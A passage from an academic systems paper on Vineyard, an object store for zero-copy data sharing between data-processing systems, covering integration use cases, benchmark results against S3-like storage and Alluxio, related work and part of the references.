the\nCollection abstraction mentioned in §4.1 where large objects are organized as a sequence of local\nobjects and can be handled by Vineyard as long as the local object can be fit into the memory of\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:18 Wenyuan Yu et al.\na single machine. Local objects that are not accessed by the data processing tasks can be spilled to\nexternal storage and will be automatically reloaded when been requested. Vineyard uses memory\nmapping to share a local object between clients and the server, thus the runtime overhead of get()\nis a constant no matter how large the local object is. For extremely large volumes of small objects,\ne.g.,millions of scalars and short bytes, Vineyard inlines their payloads into metadata to mitigate\nshared memory fragmentation, and Vineyard metadata service can process many metadata requests\nsimultaneously. Moreover, in Vineyard only objects that need to be shared between tasks will be\npersisted to the metadata service backend to reduce the overhead of creating too many entries.\nObjects that are only used by a single task will be kept in the local Vineyard server and will not\nbe synchronized across the cluster.\n5 USE CASES\nThis section describes some use cases for integrating Vineyard into data processing systems. Recall\nthat we introduce three types of commonalities for intermediate data across systems in §3. We first\nchoose three representative examples, each for one type of commonality, to show how Vineyard\ncan be easily and non-intrusively integrated to bridge different data processing systems.\nDask and PyTorch. Dask is a widely used package for distributed scientific computing. PyTorch\nis an efficient distributed machine-learning framework that operates on Numpy-like tensors with\nbuilt-in GPU and autograd support. It is common to use Dask for data preprocessing and PyTorch\nfor model training in machine learning applications. To share data from Dask to PyTorch, Dask\ngenerates Collection<VYTensor> inVineyard , and PyTorch consumes the Collection batch-by-\nbatch for training. 
Specifically, Dask represents each local object in the Collection as NumPy's ndarray, which shares the same memory layout with PyTorch's Tensor. Therefore, the integration is straightforward. (i) We implemented a wrapper for numpy.ndarray to build VYTensor by copying the blobs in numpy.ndarray to Vineyard's shared memory as blobs, and constructing VYTensor's metadata using properties of the numpy.ndarray object. If allocator hooks are enabled, the copy of blobs can be further eliminated as the numpy.ndarray already resides in Vineyard's shared memory. (ii) We implemented a wrapper to construct torch.Tensor from VYTensor using the blobs and metadata, without deserialization, data transformation or memory copying, as VYTensor and torch.Tensor share payload commonality. (iii) Further, we implemented two wrappers to handle collections, where the former builds Dask's distributed tensor as a Collection while the latter resolves a Collection to a torch.utils.data.Dataset. The integration takes 30 lines of Python code for Dask and 58 lines of Python code for PyTorch.
GraphScope and GraphX. Both GraphScope and GraphX are distributed graph processing systems. GraphScope provides an efficient graph data structure (Fragment) implementation and a set of standard built-in algorithms with superior performance, whereas GraphX supports various user-defined algorithms and was deployed earlier and more widely. It is common in our organization for GraphScope to be used to execute standard algorithms and for GraphX to be used for user-defined algorithms in a single workflow. The graph data structures in GraphScope and GraphX have completely different memory layouts but roughly the same APIs (interfaces), e.g., Fragment.Vertices() and Graph.vertices(). These two graph processing systems are implemented in different programming languages, C++ and Scala, respectively. As described in §4.2, we implemented a thin C++ wrapper over VYFragment for GraphScope, and a wrapper over the JNI bindings generated by VCDL to align with GraphX's APIs. Thanks to the optimizations described in §4.2 that ensure the efficiency of the JNI bindings, the integration finally removes the cost of graph data transformation and achieves 2∼10× speedups in running GraphX algorithms directly on GraphScope's graph structure. To align the graph data structure in these two systems with Vineyard, it takes 108 lines of C++ code for GraphScope and 208 lines of code for GraphX to implement the straightforward wrappers over VYFragment defined using VCDL.
However, due to the highly customized data layout in ClickHouse's MergeTreeTableEngine, it is non-trivial to integrate a plain columnar data structure into ClickHouse. Vineyard provides a FUSE driver which provides a filesystem view for objects stored in Vineyard, where a VYDataFrame can be read as a Parquet or ORC file using the standard POSIX file system interfaces. Upon the FUSE driver, ClickHouse can directly consume those VYDataFrame objects as Parquet files using its built-in Parquet reader, avoiding expensive I/O to and from external storage, without any modification to existing data processing engines. Further, ClickHouse can pass chunk access patterns (e.g., sequential scan) as hints to Vineyard using the standard ioctl() API [2] to enable Vineyard to preload chunks that will be accessed shortly from external storage back to memory when spilling happens, improving the overlap of computation and I/O time to achieve better performance.
6 EVALUATION
In this section, we report the performance of Vineyard over real-life complex data analytics jobs, micro benchmarks about optimizations, the Vineyard integration with various data processing systems, as well as our experience and observations of deploying Vineyard in a production environment. The test bed is a Kubernetes cluster with over 1000 hosts. Each host is equipped with 2 Intel 8269CY CPUs, 768GB RAM, 1TB SSD, and a 50G NIC with RoCE support.
Data-intensive analytics jobs. We choose three real-life workflows to evaluate Vineyard:
(1) A node classification job on a citation network. Given the ogbn-mag data [38], we build a heterogeneous citation network from Microsoft Academic Graph. To predict the class of each paper, we build a machine learning pipeline and apply both the attribute and structural information of the graph data. The workflow involves graph analytics, graph neural network inference and subgraph extraction, and consists of the following steps: (i) defining the graph schema and loading the graph; (ii) running graph algorithms (K-core and triangle counting) in libgrape-lite [24] to generate more features for each vertex in the graph; (iii) executing a GNN model for vertex classification in GraphLearn [66]; and (iv) querying the concerned subgraph structure in GAIA [53].
(2) A customer revenue prediction job. Based on user visiting behaviors from Google Play Store [1], this job leverages a random forest model after several data cleaning steps to predict the per-user revenues. The workflow contains: (i) cleaning the dataset (e.g., dropping missing values) using Presto SQL and combining the necessary feature columns into a feature table; (ii) predicting the per-user revenues using a pre-trained random forest model; and (iii) using the prediction results for further data analysis, such as the correlation between revenues and user devices. This workflow consists of 16 tasks which involve Presto [56], Pandas [16] and scikit-learn [55].
(3) A fraudulent user detection job, as shown in Figure 1. Given a set of transaction records (i.e., user-item pairs), the attributes of users, as well as some users marked with known fraud labels, this job aims to detect more users involved in fraud. The workflow consists of: (i) creating a bipartite graph from the transaction records, where vertices are users and items, and edges represent transaction relationships; (ii) running graph algorithms such as PageRank/SimRank in libgrape-lite [24] as new vertex attributes; (iii) selecting influential users and tailoring attribute tables in Pandas [16]; and (iv) training a deep learning model to predict more fraudulent users in PyTorch.
Table 1. Results for end-to-end time, data sharing time, and memory footprints.
Jobs               | Size (GB) | End-to-end time (s)          | Data sharing time (s)        | Memory footprint (GB)
                   |           | S3-like / Alluxio / Vineyard | S3-like / Alluxio / Vineyard | S3-like / Alluxio / Vineyard
Graph Processing   | 255.5     | 5473.9 / 3978.4 / 1403.1     | 1797.5 / 411.4 / 6           | 1474.7 / 1684.9 / 1219.2
Revenue Prediction | 170.6     | 4472.4 / 1088.5 / 439.1      | 4151.2 / 767.3 / 117.9       | 311.8 / 526.9 / 290.1
Fraud Detection    | 617.9     | 16669.2 / 4401.6 / 1767.7    | 15137.6 / 2869.2 / 235.3     | 1120.8 / 1738.7 / 785.4
Datasets. For job (1), we use a heterogeneous network ogbn-mag [6]: it contains 4 types of entities, as well as four types of directed relations connecting two entities. For job (2), we apply the dataset from the Kaggle contest "Google Analytics Customer Revenue Prediction" [1], which consists of a set of visiting records including visitID, location, device, time, visiting count, and other extra attributes. For job (3), we employ three real-life datasets from production which consist of all transaction records in a period of 15 days from Alibaba. Table 1 summarizes the statistics of the datasets in jobs (1) to (3). All datasets are stored as compressed CSV files.
Baselines. We compared Vineyard with the following baselines: (i) an S3-like object store service, where all intermediate data is directly stored as files, and (ii) Alluxio, which works like a memory cache for a file system that transparently caches frequently accessed data in memory to improve throughput and reduce I/O costs.
Exp-1: End-to-end and data-sharing performance. We first evaluate the end-to-end performance and data-sharing costs of Vineyard, and compare with its competitors on the cluster when there were no other data analytics jobs running. Table 1 reports the end-to-end performance of the three jobs. The end-to-end time means the runtime of the whole workflow, starting from loading data from files to outputting the final results. Here data-sharing costs include those for data (de)serialization, I/Os, and data migration across hosts when the data processing system is not co-located with its inputs. In this experiment, we used 8 workers for each job.
(1) Overall, on the end-to-end performance side, Vineyard achieves 3.9∼10× speedups compared with S3-like and 2.5∼2.8× speedups compared with Alluxio. This is mostly due to the effectiveness of Vineyard in reducing data-sharing costs for complex and nested data structures. Note that job (1) shares a single graph in the whole workflow, rendering the data-sharing time small with Vineyard. Compared with its competitors, Vineyard achieves a 28.8× speedup on average, up to 68.4×, on cross-system data sharing.
(2) Vineyard requires a smaller memory footprint in all jobs. Vineyard uses 70%∼90% of the memory of S3-like, and 45%∼72% of that of Alluxio. This benefit mainly comes from the memory mapping of Vineyard, which enables data sharing in a zero-copy fashion. Alluxio requires more memory due to its file-cache mechanism, while copying inevitably incurs (de)serialization costs.
Exp-2: Put and get objects.
We further evaluated the data-sharing efficiency of Vineyard with three widely used data structures: (1) a dataframe containing 6 columns and 351 million rows, (2) a tensor with 2.1 billion elements, and (3) a graph of 60 million vertices and 167 million edges. Each element of the dataframe object and the tensor object is stored as an int64. A graph has two main data structures: a HashMap to index its vertices and a sparse matrix in CSR (compressed sparse row) format for its edges. Each object takes around 16GB of space when loaded into main memory. We partitioned these objects into 2, 4, and 8 chunks and evaluated the time of building a collection in Vineyard and getting it back from Vineyard.
Fig. 9. Efficiency of data sharing: (a) building objects (build-meta vs. build-blobs time) and (b) getting objects (get-meta vs. get-blob time) for the dataframe, tensor and graph objects partitioned into 2, 4, and 8 chunks.
Note that we turn off the allocator when building the blobs in this experiment; otherwise the blob-building time would be nearly zero. This is because there is no data-copy cost when the allocator is enabled, and the only extra cost of malloc is less than 1μs on average, which is comparable to state-of-the-art malloc libraries. More specifically, the malloc cost is constant with respect to both the size of a blob and the structure of the data. Therefore, the blob-building time is generally ignored when the allocator is on. The results are reported in Figure 9. We find the following:
(1) We observe that on average over 99% of the building time is spent saving the blobs to the shared memory of Vineyard. The time of saving metadata to the object store is quite small, i.e., less than 0.13s in all cases. Since there is no serialization cost when building these objects, storing objects in Vineyard only involves memory copying and is very efficient (see §4.1).
(2) The building time of objects scales very well. It takes 1.4s, 1.3s, and 2.9s to build a Collection of 8 local objects distributed evenly across hosts for the tested dataframes, tensors, and graphs, respectively. The graph building time is larger than the others, as each fragment of the graph object needs to build the same global vertex map, which alone accounts for around 5GB of memory space.
(3) Compared with the building time, the time of getting an object from Vineyard is negligible, i.e., less than 0.9% of the building time in all cases. On average, it takes 0.034s, 0.024s, and 0.038s to get the dataframe, tensor and graph objects, respectively. This is because getting objects is conducted in a zero-copy fashion via memory mapping, thanks to the decoupled design of objects.
(4) The extra overhead of Vineyard for fetching objects from remote hosts is small as well. As discussed in §4.3, in many cases, fetching of remote objects is minimized with the locality-aware scheduler plugin. When such fetches are necessary, we measured the cost of fetch() for 100K tensor objects with sizes ranging from 8MB to 10GB over the UDP, TCP and RDMA I/O connectors. Our evaluation shows that Vineyard can fully utilize the network with little overhead (more than 94.61% utilization of the network bandwidth reported by the respective iperf3 (iperf-rdma for RDMA) tests).
Exp-3: Incremental object creation. We next evaluated the time and space efficiency of incremental object creation.
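Before reporting the numbers, a minimal sketch helps to illustrate what incremental creation amounts to in client code, mirroring the add-column example of Figure 5. The builder follows Figure 7, while the client type, the construction of an ArrayBuilder from an existing Array and the BuildAmountColumn() helper are hypothetical, introduced only for this example.

// Illustrative sketch: extend an existing DataFrame with one new column,
// reusing (not copying) the payloads of the existing columns.
DataFrame old_df = client.Get<DataFrame>(old_id);

ColWiseDataFrameBuilder<int64_t> builder;                            // builder from Figure 7
builder.addCol(ArrayBuilder<int64_t>(old_df.getCol(0)), "UserID");   // shared blob, zero-copy
builder.addCol(ArrayBuilder<int64_t>(old_df.getCol(1)), "ItemID");   // shared blob, zero-copy
builder.addCol(BuildAmountColumn(client), "Amount");                 // only the new column is materialized
DataFrame new_df = builder.seal();                                   // new metadata, shared payloads

Only the metadata of new_df is new; the existing columns reference the same blobs as the old object, which is exactly what the incremental creation (IncBuild) evaluated below exploits.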
Varying the number of rows from 88 million to 352 million of an existing dataframe with five columns, we built a new dataframe by inserting one new column into the existing one. Varying the number of vertices from 148 million to 2 billion of a simple graph with an average degree of 5, we added 2 properties for each vertex and converted it to a property graph [53]. Each dataframe or graph object has 8 chunks. We compared incremental object creation IncBuild with a baseline ReBuild that re-builds new objects starting from scratch.
Fig. 10. Effectiveness of Incremental Object Creation.
Fig. 11. Performance of VCDL code generation for different languages.
As shown in Figure 10, IncBuild outperforms ReBuild in time efficiency by 7.2× and 26.3× on average, and by up to 8.4× and 33.9×, for dataframe and graph, respectively. To build the new dataframe and graph objects, IncBuild on average saves 83.3% and 99.4% of memory space usage, since Vineyard objects are composable and IncBuild can safely reuse and share existing blobs with the old dataframe and graph objects (see §4.1). Moreover, the saved time and space grow as the original data volume scales, indicating the necessity of composability and incremental object creation when facing large-scale data.
Table 2. Comparison of integration cost & performance with different systems.
VCDL Type    | Systems    | S3-Like C_in / C_out | Alluxio C_in / C_out | Vineyard C_in / C_out | LOCs | Vineyard FUSE C_in / C_out
VYTensor     | NumPy      | 1.0 / 0.5627         | 0.1057 / 0.2794      | 0.0026 / 0.0019       | 32*  | 0.0949 / 0.1559
VYTensor     | PyTorch    | 1.0 / 0.3859         | 0.0669 / 0.1854      | 0.0029 / 0.0025       | 58*  | 0.0746 / 0.1290
VYTensor     | XTensor    | 1.0 / 0.6881         | 0.0908 / 0.3195      | 0.0045 / 0.0588       | 46+  | 0.0734 / 0.1782
VYDataFrame  | Arrow      | 1.0 / 0.6360         | 0.5964 / 0.6345      | 0.015 / 0.033         | 148* | 0.1279 / 0.3610
VYDataFrame  | Pandas     | 1.0 / 0.7708         | 0.7516 / 0.7671      | 0.0139 / 0.023        | 68*  | 0.5288 / 0.4434
VYDataFrame  | HDataFrame | 1.0 / 0.5495         | 0.2282 / 0.2569      | 0.0035 / 0.1399       | 121+ | 0.2187 / 0.3206
VYFragment   | GraphScope | 1.0 / 1.9529         | 0.4002 / 1.8365      | 0.0038 / 0.0323       | 108* | 0.3721 / 1.7891
VYFragment   | PowerGraph | 1.0 / 0.6442         | 0.8128 / 0.6359      | 0.0058 / 0.2334       | 144+ | 0.8323 / 0.6010
VYFragment   | GraphX     | 1.0 / 0.3440         | 0.8049 / 0.1985      | 0.0039 / 0.1148       | 208+ | 0.6700 / 0.1783
1 When benchmarking Alluxio, we preload data to the MEMORY cache for reads and use MUST_CACHE as the write policy for its best performance.
2 Data processing systems are implemented in different programming languages, including Python, C++ and Java.
3 Vineyard is integrated into data processing systems by either payload sharing (annotated with *) or method sharing (annotated with +).
Exp-4: Integration cost and efficiency. To evaluate the cost of integration and the performance of Vineyard, we compared the integration cost (measured by lines of source code change [50]) and performance (measured by execution time) between Vineyard and other solutions. We chose three types of data structures, i.e., tensors, dataframes, and graphs, and three data processing systems for each data type to evaluate the performance of exchanging intermediate data between those systems over different data storage media. For our baselines, the S3-like object store and Alluxio, we use formats that are already supported by those data processing systems as the intermediate data formats, i.e., HDF5, Parquet, and CSV, respectively. When integrating with Vineyard, we use VCDL to define VYTensor, VYDataFrame, and VYFragment as the intermediate data formats.
We deployed a micro-benchmark with around 10GB of intermediate data for each data type. Table 2 shows the normalized execution time of data sharing as well as the lines of code needed for integrating the above data types with data processing systems. C_in represents the cost of get() from Vineyard and C_out represents the cost of put() into Vineyard. We observed the following: (i) Vineyard outperforms the baselines in both get() and put(). With payload sharing, both get() and put() only involve metadata manipulation without memory copies for blobs. With only method sharing, get() is still fast, as no data (de)serialization or transformation is needed; however, put() needs extra costs to build the system-specific data structure into Vineyard. (ii) Even without extra integration, the FUSE driver can still help reduce the cost of data sharing, compared to exchanging intermediate data over external storage or file-system-oriented caching systems, as the filesystem views are carefully maintained in memory by Vineyard.
Further, we take Java as the target to evaluate the performance of the cross-language optimizations in method sharing mentioned in §4.2. Figure 11 shows: (i) the overhead of cross-language method sharing is low compared to naive FFI calls (e.g., VCDL-Java vs. JNI); and (ii) calling into a foreign language is more efficient than an implementation in the native language (e.g., VCDL-Java vs. Java).
Exp-5: Vineyard in production environments. We have deployed Vineyard in production environments and obtained large gains in optimizing intermediate data-sharing time in various data-intensive workflows. Among them, many consist of steps including similarity search, graph analytics, SQL and deep learning, and Hive-like data-warehouse tables are used as external storage. Those workflows are scheduled to a large Kubernetes cluster as around 40,000 jobs within a day. The scale of steps in these jobs ranged from 1 to 4000 workers, and the size of intermediate data varies from several MBs to hundreds of GBs.
Fig. 12. Deploying Vineyard in production environments: I/O rates (0.0 to 1.0) and end-to-end acceleration (1× to 16×) for jobs sampled from the Alibaba production environment from 2022.06.01 to 2022.10.31, ordered by absolute end-to-end execution time; percentile markers range from P20 (8.90s) to P100 (9425.64s).
Figure 12 demonstrates the statistics of the I/O cost ratio in end-to-end execution time for intermediate data sharing, uniformly sampled from our daily production environments. With data-warehouse tables, loading input data from tables and saving results into tables usually consumes over 40% of the total execution time, and the number can be up to 95.06% in some cases when the end-to-end execution time gets longer. The I/O cost is high for both short-lived and long-running jobs, and sharing intermediate data is a common concern in big-data analytical applications. We then measured the acceleration after introducing Vineyard into intermediate data sharing. As shown in Figure 12, there is a stable acceleration effect for both short-lived and long-running jobs, and the end-to-end execution time can be accelerated by up to 9.48×.
7 RELATED WORK
single-system vs. multi-system.
Existing systems like Ray [49] and Spark [65] aim to provide simple and universal APIs for diverse workloads. However, previous work [67] has shown that workload-specific systems may outperform these general systems by over 100× for applications like graph computation. Thus, a multi-system approach is a necessity for handling real-life complex data analytics workflows.
Cross-system data sharing. Various distributed storage systems, e.g., HDFS [57], S3 [10] and Alluxio [40], are often applied to share intermediate data in multi-system settings. However, they suffer from huge (de)serialization and/or I/O overheads [11, 32, 60]. Thus, some recent work, e.g., Apache Arrow Plasma [31], enables zero-copy data sharing for some data structures. However, it cannot cover diverse data structures and fails to scale out to share distributed data that cannot fit into the memory of a single machine.
Multi-language interfaces. The idea of providing multiple language interfaces by generating boilerplate code from a description language has been widely adopted in many projects like Protobuf and Thrift [58]. There are also attempts showing the benefits of translating LLVM bitcode to JVM bytecode [54, 59]. Another research direction in polyglot programming is compiling programs in different programming languages to the same IR and executing them on the same runtime [62]. However, the compilation barrier across languages still exists. Compared with existing work, Vineyard proposes a novel way to handle generics when generating multiple-language interfaces and makes the integration easier. Instead of compiling all LLVM bitcode to JVM bytecode, Vineyard only translates certain instructions that can be properly handled by the JIT compiler and gains performance improvements.
Data-aware scheduling. Data-intensive analytics workflows (jobs) suffer from expensive data shuffle costs. Especially on Kubernetes, the scheduler routes tasks to nodes only based on computing-resource considerations, lacking information about data exchanged between tasks. To solve this problem, some recent work, e.g., Fluid [12], binds pods to nodes based on the information of the volumes that mount the required inputs, in order to ensure co-location between computation and data. However, it is ill-suited for dynamic resources on multi-tenant clusters where co-location cannot always be fulfilled. Instead, Vineyard applies an adaptive switch mechanism to optimize task scheduling on-the-fly to minimize the data shuffle costs.
8 CONCLUSION
Specialized data processing systems targeted at specific workloads often provide high performance. However, sharing intermediate data from one system to another becomes a major bottleneck. To alleviate high cross-system data-sharing costs, we present Vineyard, a high-performance, extensible, and cloud-native object store. With Vineyard, data sharing can be efficiently conducted via payload sharing and method sharing. It also provides an IDL named VCDL to facilitate the integration. As a cloud-native system, Vineyard is designed to be native in interacting with container orchestration systems, as well as achieving fault tolerance and high performance in production environments. Vineyard is open-source and under active development. It is already integrated or being integrated with over 20 data processing systems. We hope Vineyard can be used as a common component for data-intensive jobs and connect diverse big-data engines.
Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:25\nREFERENCES\n[1]2019. Google Analytics Customer Revenue Prediction. https://www.kaggle.com/c/ga-customer-revenue-prediction.\n[2] 2023. ioctl(2) — Linux manual page. https://man7.org/linux/man-pages/man2/ioctl.2.html.\n[3] 2023. LD_PRELOAD — Linux manual page. https://man7.org/linux/man-pages/man8/ld.so.8.html.\n[4] 2023. Data-intensive computing. https://en.wikipedia.org/wiki/Data-intensive_computing.\n[5]2023. Kubernets Scheduling Framework. https://kubernetes.io/docs/concepts/scheduling-eviction/scheduling-\nframework.\n[6] 2023. Node Property Prediction. https://ogb.stanford.edu/docs/nodeprop/.\n[7] 2023. Production-Grade Container Orchestration. https://kubernetes.io.\n[8]Martín Abadi, Ashish Agarwal, Paul Barham, Eugene Brevdo, Zhifeng Chen, Craig Citro, Greg S. Corrado, Andy\nDavis, Jeffrey Dean, Matthieu Devin, Sanjay Ghemawat, Ian Goodfellow, Andrew Harp, Geoffrey Irving, Michael Isard,\nYangqing Jia, Rafal Jozefowicz, Lukasz Kaiser, Manjunath Kudlur, Josh Levenberg, Dandelion Mané, Rajat Monga,\nSherry Moore, Derek Murray, Chris Olah, Mike Schuster, Jonathon Shlens, Benoit Steiner, Ilya Sutskever, Kunal Talwar,\nPaul Tucker, Vincent Vanhoucke, Vijay Vasudevan, Fernanda Viégas, Oriol Vinyals, Pete Warden, Martin Wattenberg,\nMartin Wicke, Yuan Yu, and Xiaoqiang Zheng. 2015. TensorFlow: Large-Scale Machine Learning on Heterogeneous\nSystems. https://www.tensorflow.org/ Software available from tensorflow.org.\n[9]Sajid Alam, Nok Lam Chan, Gabriel Comym, Yetunde Dada, Ivan Danov, Deepyaman Datta, Tynan DeBold, Jannic\nHolzer, Rashida Kanchwala, Ankita Katiyar, Amanda Koh, Andrew Mackay, Ahdra Merali, Antony Milne, Huong\nNguyen, Nero Okwa, Juan Luis Cano Rodríguez, Joel Schwarzmann, Jo Stichbury, and Merel Theisen. 2023. Kedro .\nhttps://github.com/kedro-org/kedro\n[10] Inc. Amazon Web Service. 2022. Amazon Simple Storage Service: Object Storage built to retrieve any amount of data\nfrom anywhere. https://aws.amazon.com/s3/.\n[11] Ganesh Ananthanarayanan, Ali Ghodsi, Andrew Warfield, Dhruba Borthakur, Srikanth Kandula, Scott Shenker, and\nIon Stoica. 2012. Pacman: Coordinated memory caching for parallel jobs. In 9th USENIX Symposium on Networked\nSystems Design and Implementation (NSDI 12) . 267–280.\n[12] Fluid Authors. 2021. Fluid: elastic data abstraction and acceleration for BigData/AI applications in cloud. https://fluid-\ncloudnative.github.io.\n[13] Kubernetes Authors. 2022. Kubernets Custom Resources. https://kubernetes.io/docs/concepts/extend-kubernetes/api-\nextension/custom-resources.\n[14] Kubernetes Authors. 2022. Kubernets Operator Pattern. https://kubernetes.io/docs/concepts/extend-kubernetes/opera\ntor/.\n[15] NumPy Authors. 2022. NumPy: The fundamental package for scientific computing with Python. https://www.numpy.\norg/.\n[16] Pandas authors. 2022. Pandas: Python Data Analysis Library. https://pandas.pydata.org/.\n[17] Polars Authors. 2022. Polars: Fast multi-threaded, hybrid-streaming DataFrame library. https://www.pola.rs.\n[18] SWIG Authors. 2019. SWIG: Simplified Wrapper and Interface Generator. https://github.com/swig/swig.\n[19] Inc. ClickHouse. 2022. ClickHouse: Fast Open-Source OLAP DBMS. https://clickhouse.com/.\n[20] Dormando. 2022. memcached: a distributed memory object caching system. https://memcached.org/.\n[21] Inc. Elementl. 2023. Dagster: An orchestration platform for the development, production, and observation of data\nassets. 
https://github.com/dagster-io/dagster.\n[22] etcd Authors. 2022. etcd: A distributed, reliable key-value store for the most critical data of a distributed system.\nhttps://etcd.io/.\n[23] Wenfei Fan, Tao He, Longbin Lai, Xue Li, Yong Li, Zhao Li, Zhengping Qian, Chao Tian, Lei Wang, Jingbo Xu, Youyang\nYao, Qiang Yin, Wenyuan Yu, Kai Zeng, Kun Zhao, Jingren Zhou, Diwen Zhu, and Rong Zhu. 2021. GraphScope: A\nUnified Engine For Big Graph Processing. Proc. VLDB Endow. 14, 12 (2021), 2879–2892.\n[24] Wenfei Fan, Wenyuan Yu, Jingbo Xu, Jingren Zhou, Xiaojian Luo, Qiang Yin, Ping Lu, Yang Cao, and Ruiqi Xu. 2018.\nParallelizing sequential graph computations. ACM Transactions on Database Systems (TODS) 43, 4 (2018), 1–39.\n[25] Yihui Feng, Zhi Liu, Yunjian Zhao, Tatiana Jin, Yidi Wu, Yang Zhang, James Cheng, Chao Li, and Tao Guan. 2021.\nScaling Large Production Clusters with Partitioned Synchronization. In 2021 USENIX Annual Technical Conference\n(USENIX ATC 21) . 81–97.\n[26] Linux Foundation. 2015. Data Plane Development Kit (DPDK). http://www.dpdk.org.\n[27] The Apache Software Foundation. 2022. Apache Airflow: A platform to programmatically author, schedule, and\nmonitor workflows. https://airflow.apache.org/.\n[28] The Apache Software Foundation. 2022. Apache Data Fusion SQL Query Engine. https://arrow.apache.org/datafusion/.\n[29] The Apache Software Foundation. 2022. Apache Doris: An easy-to-use, high-performance and unified analytical\ndatabase. https://doris.apache.org/.\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:26 Wenyuan Yu et al.\n[30] The Apache Software Foundation. 2022. Apache Dremio: The Easy and Open Data Lakehouse. https://www.dremio.c\nom/.\n[31] The Apache Software Foundation. 2022. Arrow: A cross-language development platform for in-memory analytics.\nhttps://github.com/apache/arrow.\n[32] Sanjay Ghemawat, Howard Gobioff, and Shun-Tak Leung. 2003. The Google file system. In Proceedings of the nineteenth\nACM symposium on Operating systems principles . 29–43.\n[33] Ionel Gog, Malte Schwarzkopf, Natacha Crooks, Matthew P Grosvenor, Allen Clement, and Steven Hand. 2015.\nMusketeer: all for one, one for all in data processing systems. In Proceedings of the Tenth European Conference on\nComputer Systems . 1–16.\n[34] Joseph E Gonzalez, Yucheng Low, Haijie Gu, Danny Bickson, and Carlos Guestrin. 2012. Powergraph: Distributed graph-\nparallel computation on natural graphs. In 10th USENIX Symposium on Operating Systems Design and Implementation\n(OSDI 12) . 17–30.\n[35] Inc. Google. 2022. Protocol Buffers: A language-neutral, platform-neutral extensible mechanism for serializing\nstructured data. https://developers.google.com/protocol-buffers.\n[36] Robert Grandl, Arjun Singhvi, Raajay Viswanathan, and Aditya Akella. 2021. Whiz: Data-Driven Analytics Execution.\nIn18th USENIX Symposium on Networked Systems Design and Implementation (NSDI 21) .\n[37] gRPC Authors. 2022. gRPC: A high performance, open source universal RPC framework. https://grpc.io.\n[38] Weihua Hu, Matthias Fey, Hongyu Ren, Maho Nakata, Yuxiao Dong, and Jure Leskovec. 2021. Ogb-lsc: A large-scale\nchallenge for machine learning on graphs. arXiv preprint arXiv:2103.09430 (2021).\n[39] Inc. Juicedata. 2022. JuiceFS: A POSIX, HDFS and S3 compatible distributed file system for cloud. https://juicefs.com/en/.\n[40] Haoyuan Li, Ali Ghodsi, Matei Zaharia, Scott Shenker, and Ion Stoica. 2014. Tachyon: Reliable, memory speed storage\nfor cluster computing frameworks. 
In Proceedings of the ACM Symposium on Cloud Computing . 1–15.\n[41] Jingdong Li, Zhao Li, Jiaming Huang, Ji Zhang, Xiaoling Wang, Xingjian Lu, and Jingren Zhou. 2021. Large-scale Fake\nClick Detection for E-commerce Recommendation Systems. In ICDE .\n[42] libclang Authors. 2022. libclang: C interface to Clang. https://clang.llvm.org/doxygen/group__CINDEX.html.\n[43] libfuse authors. 2022. libfuse: The reference implementation of the Linux FUSE (Filesystem in Userspace) interface.\nhttps://github.com/libfuse/libfuse.\n[44] Redis Ltd. 2022. Redis: The open source, in-memory data store. https://redis.io/.\n[45] The Alibaba Group Holding Ltd. 2022. Mars: a tensor-based unified framework for large-scale data computation.\nhttps://github.com/mars-project/mars.\n[46] Ruotian Luo. 2017. An Image Captioning codebase in PyTorch. https://github.com/ruotianluo/ImageCaptioning.pytorc\nh.\n[47] Frank McSherry, Michael Isard, and Derek G Murray. 2015. Scalability! But at what COST?. In 15th Workshop on Hot\nTopics in Operating Systems (HotOS XV ) .\n[48] Anthony M Middleton. 2010. Data-intensive technologies for cloud computing. In Handbook of cloud computing .\nSpringer, 83–136.\n[49] Philipp Moritz, Robert Nishihara, Stephanie Wang, Alexey Tumanov, Richard Liaw, Eric Liang, Melih Elibol, Zongheng\nYang, William Paul, Michael I Jordan, et al .2018. Ray: A distributed framework for emerging AI applications. In 13th\nUSENIX Symposium on Operating Systems Design and Implementation (OSDI 18) . 561–577.\n[50] Vu Nguyen, Sophia Deeds-Rubin, Thomas Tan, and Barry Boehm. 2007. A SLOC counting standard. In Cocomo ii\nforum , Vol. 2007. Citeseer, 1–16.\n[51] Shoumik Palkar and Matei Zaharia. 2019. Optimizing Data-Intensive Computations in Existing Libraries with Split\nAnnotations. In Proceedings of the 27th ACM Symposium on Operating Systems Principles (Huntsville, Ontario, Canada)\n(SOSP ’19) . Association for Computing Machinery, New York, NY, USA, 291–305. https://doi.org/10.1145/3341301.3359\n652\n[52] Adam Paszke, Sam Gross, Francisco Massa, Adam Lerer, James Bradbury, Gregory Chanan, Trevor Killeen, Zeming\nLin, Natalia Gimelshein, Luca Antiga, Alban Desmaison, Andreas Kopf, Edward Yang, Zachary DeVito, Martin Raison,\nAlykhan Tejani, Sasank Chilamkurthy, Benoit Steiner, Lu Fang, Junjie Bai, and Soumith Chintala. 2019. PyTorch: An\nImperative Style, High-Performance Deep Learning Library. In Advances in Neural Information Processing Systems\n32. Curran Associates, Inc., 8024–8035. http://papers.neurips.cc/paper/9015-pytorch-an-imperative-style-high-\nperformance-deep-learning-library.pdf\n[53] Zhengping Qian, Chenqiang Min, Longbin Lai, Yong Fang, Gaofeng Li, Youyang Yao, Bingqing Lyu, Xiaoli Zhou,\nZhimin Chen, and Jingren Zhou. 2021. GAIA: A System for Interactive Analysis on Distributed Graphs Using a\nHigh-Level Language. In 18th USENIX Symposium on Networked Systems Design and Implementation (NSDI 21) .\n[54] Manuel Rigger, Matthias Grimmer, and Hanspeter Mössenböck. 2016. Sulong - Execution of LLVM-Based Languages\non the JVM: Position Paper. In Proceedings of the 11th Workshop on Implementation, Compilation, Optimization of\nObject-Oriented Languages, Programs and Systems (Rome, Italy) (ICOOOLPS ’16) . Association for Computing Machinery,\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:27\nNew York, NY, USA, Article 7, 4 pages. https://doi.org/10.1145/3012408.3012416\n[55] scikit-learn Authors. 2022. 
